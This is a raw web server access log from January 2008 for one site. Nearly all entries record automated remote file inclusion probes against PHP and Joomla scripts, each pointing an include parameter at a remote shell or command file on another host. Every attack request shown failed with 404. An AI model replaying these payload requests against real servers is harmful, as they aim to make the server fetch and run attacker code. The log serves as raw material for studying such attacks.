209.25.195.74 - - [06/Jan/2008:17:16:11 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:11 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:13 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:13 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:13 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:15 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:17 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:43 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:44 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:44 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:47 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:47 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:47 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:47 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:47 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:16:51 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:17:17:01 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:17:17:05 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:17:18 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:17:19 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:17:19 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.25.195.74 - - [06/Jan/2008:17:17:19 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.150.12 - - [06/Jan/2008:17:18:04 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.150.12 - - [06/Jan/2008:17:18:04 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.129.105 - - [06/Jan/2008:17:18:26 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:17:18:33 -0800] "GET /admin.php?include_path=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:17:18:33 -0800] "GET /logs/admin.php?include_path=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
66.11.114.236 - - [06/Jan/2008:17:19:35 -0800] "GET /logs/access_071218.log/admin.php?include_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.114.236 - - [06/Jan/2008:17:19:35 -0800] "GET /admin.php?include_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.114.236 - - [06/Jan/2008:17:19:35 -0800] "GET /logs/admin.php?include_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:19:52 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:19:52 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:19:52 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.114.236 - - [06/Jan/2008:17:20:24 -0800] "GET /logs/access_071229.log/admin.php?include_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:20:43 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:17:22:23 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:17:22:23 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:17:22:24 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.48.214 - - [06/Jan/2008:17:37:54 -0800] "GET /logs/access_071229.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.12.48.214 - - [06/Jan/2008:17:37:55 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.12.48.214 - - [06/Jan/2008:17:37:55 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.173.130.140 - - [06/Jan/2008:17:39:18 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.106.5 - - [06/Jan/2008:17:39:25 -0800] "GET /logs/access_071229.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.234.106.5 - - [06/Jan/2008:17:39:26 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.234.106.5 - - [06/Jan/2008:17:39:27 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.11.114.236 - - [06/Jan/2008:17:41:26 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:17:43:54 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:17:43:55 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:17:43:56 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:17:44:19 -0800] "GET /index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:17:44:19 -0800] "GET /logs/index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
72.30.179.208 - - [06/Jan/2008:17:44:40 -0800] "GET /funny/?D=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:55 -0800] "GET /logs/access_071229.log//calendar/include.php?path[docroot]=http://lindapoker.com/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:55 -0800] "GET /logs/access_071229.log//calendar/include.php?path[docroot]=http://www.northshoreclassifieds.com/chat/chat/localization/spanish/vhost/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:55 -0800] "GET /logs/access_071229.log//calendar/include.php?path[docroot]=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:55 -0800] "GET /logs/access_071229.log//calendar/include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:56 -0800] "GET /logs/access_071229.log//calendar/include.php?path[docroot]=http://ofla.bravehost.com/b/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:56 -0800] "GET /logs/access_071229.log//calendar/include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:56 -0800] "GET /logs/access_071229.log//calendar/include.php?path[docroot]=http://h1.ripway.com/korax/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:56 -0800] "GET /logs/access_071229.log//calendar/include.php?path[docroot]=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:56 -0800] "GET /logs//calendar/include.php?path[docroot]=http://lindapoker.com/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:57 -0800] "GET /logs//calendar/include.php?path[docroot]=http://www.northshoreclassifieds.com/chat/chat/localization/spanish/vhost/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:57 -0800] "GET /logs//calendar/include.php?path[docroot]=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:57 -0800] "GET /logs//calendar/include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:57 -0800] "GET /logs//calendar/include.php?path[docroot]=http://ofla.bravehost.com/b/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:58 -0800] "GET /logs//calendar/include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:58 -0800] "GET /logs//calendar/include.php?path[docroot]=http://h1.ripway.com/korax/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [06/Jan/2008:17:45:58 -0800] "GET /logs//calendar/include.php?path[docroot]=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.144.55.219 - - [06/Jan/2008:17:47:43 -0800] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.144.55.219 - - [06/Jan/2008:17:47:43 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.21.152.2 - - [06/Jan/2008:17:49:30 -0800] "GET //login.php?dir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [06/Jan/2008:17:49:31 -0800] "GET //login.php?dir=http://www.odady.com/images/tOtti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [06/Jan/2008:17:50:21 -0800] "GET //login.php?dir=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.173.130.140 - - [06/Jan/2008:17:53:48 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.140 - - [06/Jan/2008:17:53:49 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:17:54:20 -0800] "GET /logs/access_071224.log/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:17:54:21 -0800] "GET /admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:17:54:21 -0800] "GET /logs/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:54:41 -0800] "GET /logs/access_071224.log/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:54:42 -0800] "GET /admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:54:42 -0800] "GET /logs/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.30.130 - - [06/Jan/2008:17:55:07 -0800] "GET /logs/index.php?option=com_jwmmxtd&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.249.30.130 - - [06/Jan/2008:17:55:07 -0800] "GET /index.php?option=com_jwmmxtd&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
72.249.30.130 - - [06/Jan/2008:17:55:18 -0800] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.249.30.130 - - [06/Jan/2008:17:55:18 -0800] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.22.240.103 - - [06/Jan/2008:17:56:12 -0800] "GET /logs/access_071229.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.240.103 - - [06/Jan/2008:17:56:12 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.240.103 - - [06/Jan/2008:17:56:13 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:56:21 -0800] "GET /logs/access_071222.log/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:56:28 -0800] "GET /logs/access_071214.log/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:56:28 -0800] "GET /logs/access_071218.log/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:17:56:36 -0800] "GET /logs/access_071222.log/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:17:56:49 -0800] "GET /logs/access_071214.log/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:17:56:49 -0800] "GET /logs/access_071218.log/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [06/Jan/2008:17:57:31 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:17:58:17 -0800] "GET /logs/access_071229.log/admin.php?include_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.114.236 - - [06/Jan/2008:17:59:51 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.114.236 - - [06/Jan/2008:17:59:51 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.114.236 - - [06/Jan/2008:17:59:51 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.218.0.211 - - [06/Jan/2008:18:00:38 -0800] "GET /logs/access_071229.log//login.php?dir=http://pucorp.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.218.0.211 - - [06/Jan/2008:18:00:38 -0800] "GET //login.php?dir=http://pucorp.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.218.0.211 - - [06/Jan/2008:18:00:38 -0800] "GET /logs//login.php?dir=http://pucorp.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.114.236 - - [06/Jan/2008:18:00:54 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.218.0.211 - - [06/Jan/2008:18:01:04 -0800] "GET //login.php?dir=http://pucorp.org/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:18:06:36 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:18:06:36 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:18:06:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [06/Jan/2008:18:09:22 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [06/Jan/2008:18:09:22 -0800] "GET /logs//login.php?dir=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [06/Jan/2008:18:09:24 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.odady.com/images/tOtti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [06/Jan/2008:18:09:24 -0800] "GET /logs//login.php?dir=http://www.odady.com/images/tOtti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [06/Jan/2008:18:09:28 -0800] "GET /logs/access_071229.log//login.php?dir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [06/Jan/2008:18:09:29 -0800] "GET /logs//login.php?dir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [06/Jan/2008:18:12:19 -0800] "GET /admin/inc/change_action.php?format_menue=http://arf.org.uk/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
67.19.192.212 - - [06/Jan/2008:18:12:19 -0800] "GET /logs/admin/inc/change_action.php?format_menue=http://arf.org.uk/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:18:17:03 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:18:17:03 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:18:17:03 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.106.191 - - [06/Jan/2008:18:20:11 -0800] "GET /config.php?fpath=http://bobatka.info/modules/language/asc/asc/r7?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
87.118.106.191 - - [06/Jan/2008:18:20:11 -0800] "GET /logs/config.php?fpath=http://bobatka.info/modules/language/asc/asc/r7?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.186.169.183 - - [06/Jan/2008:18:20:34 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
